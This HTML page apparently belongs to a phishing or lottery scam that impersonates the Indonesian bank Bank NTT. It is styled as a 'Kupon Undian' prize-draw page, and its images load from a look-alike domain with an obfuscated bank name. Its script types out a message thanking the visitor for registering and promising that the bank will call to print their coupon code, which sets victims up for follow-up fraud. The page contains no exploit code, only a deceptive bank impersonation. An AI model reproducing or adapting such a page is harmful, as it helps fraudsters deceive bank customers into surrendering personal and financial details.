<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>𝗞𝘂𝗽𝗼𝗻 𝗨𝗻𝗱𝗶𝗮𝗻 | 𝗕𝗮𝗻𝗸 NTT</title>
</head>

<body>

  <style>
    * {
      padding: 0;
      margin: 0;
      text-decoration: none;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }

    .header {
      display: flex;
      width: 100%;
      height: 13vh;
      background-color: rgb(255, 255, 255);
      border-bottom: 1px solid rgb(193, 190, 190);
    }

    .header .logo {
      display: flex;
      position: absolute;
      left: 20px;
    }

    .header .logo2 {
      width: 150px;
      height: 50px;
      margin-top: 30px;
    }

    .header .logo1 {
      width: 100px;
      margin-top: 8px;
      padding: 10px 0px;
    }

    .header .bahasa {
      right: 40px;
      position: absolute;
      display: flex;
      margin-top: 45px;
    }

    .header h1 {
      text-decoration: underline;
      font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
      font-size: 0.8rem;
      cursor: pointer;
      margin-left: 180px;
    }

    section {
      margin: 0 auto;
      justify-content: center;
      display: flex;
      text-align: center;
    }

    .kolom1 {
      display: flex;
      background-color: rgb(94, 148, 250);
      width: 100%;
      margin: 0px 20px;
      border: 3px solid whitesmoke;
      box-shadow: 0px 0px 10px 1px black;
      padding: 20px;
      border-radius: 30px;
      text-align: center;
      height: 150px;
    }

    #typedtext {
      font-family: monospace;
      font-size: 20px;
      color: white;
      font-weight: 800;
    }

    /* The typewriter cursor effect */
    @keyframes blink-caret {

      from,
      to {
        border-color: transparent
      }

      50% {
        border-color: orange
      }
    }
    .info {
      display: flex;
      justify-content: center;
      margin-top: 20px;
    }
    .info h2{
      background-color: rgb(94, 148, 250);
      padding: 10px;
      font-size: 1rem;
      border-top-right-radius: 20px;
      border-top-left-radius: 20px;
      border-top: 3px solid whitesmoke;
      color: white;
      box-shadow: 0px 0px 5px 1px black;
      border-left: 1px solid whitesmoke;
      border-right: 1px solid whitesmoke;
    }
    footer {
      position: fixed;
      bottom: 0;
    }
    footer img {
      width: 100%;
    }
    .foto img {
      width: 100%;
      border-bottom-right-radius: 200px;
      box-shadow: 0px 0px 5px 5px black;
      border-bottom: 3px solid rgb(93, 93, 4);
    }
  </style>

  <header class="header">
    <div class="logo">
      <img class="logo1" src="llooggoo.png">
      <img class="logo2" src="logo2.png" alt="">
    </div>
    <div class="bahasa">
      <h1>Bahasa Indonesia </h1>
    </div>
  </header>
  <div class="foto">
    <img src="https://programundinb4nkntt.yyznxn.web.id/images/1000226744.png" alt="">
  </div>
  <div class="info">
    <h2>INFORMATION</h2>
  </div>
  <section>
    <div class="kolom1">
    <div id="typedtext"></div>
    </div>
  </section>

  <footer>
    <img src="https://programundinb4nkntt.yyznxn.web.id/images/3nj843.jpg" alt="">
  </footer>

  <script>
    // set up text to print, each item in array is new line
var aText = new Array(
"Terima Kasih Telah Mendaftar Dilayanan Bank NTT", 
"Pendaftaran Anda Sedang Diproses,Beberapa Saat Lagi Anda Akan Dihubungi Oleh Pihak Bank NTT, Untuk Proses Cetak Kode Kupon Undian Anda"
);
var iSpeed = 100; // time delay of print out
var iIndex = 0; // start printing array at this posision
var iArrLength = aText[0].length; // the length of the text array
var iScrollAt = 20; // start scrolling up at this many lines
 
var iTextPos = 0; // initialise text position
var sContents = ''; // initialise contents variable
var iRow; // initialise current row
 
function typewriter()
{
 sContents =  ' ';
 iRow = Math.max(0, iIndex-iScrollAt);
 var destination = document.getElementById("typedtext");
 
 while ( iRow < iIndex ) {
  sContents += aText[iRow++] + '<br />';
 }
 destination.innerHTML = sContents + aText[iIndex].substring(0, iTextPos) + "_";
 if ( iTextPos++ == iArrLength ) {
  iTextPos = 0;
  iIndex++;
  if ( iIndex != aText.length ) {
   iArrLength = aText[iIndex].length;
   setTimeout("typewriter()", 500);
  }
 } else {
  setTimeout("typewriter()", iSpeed);
 }
}


typewriter();
  </script>
</body>

</html>
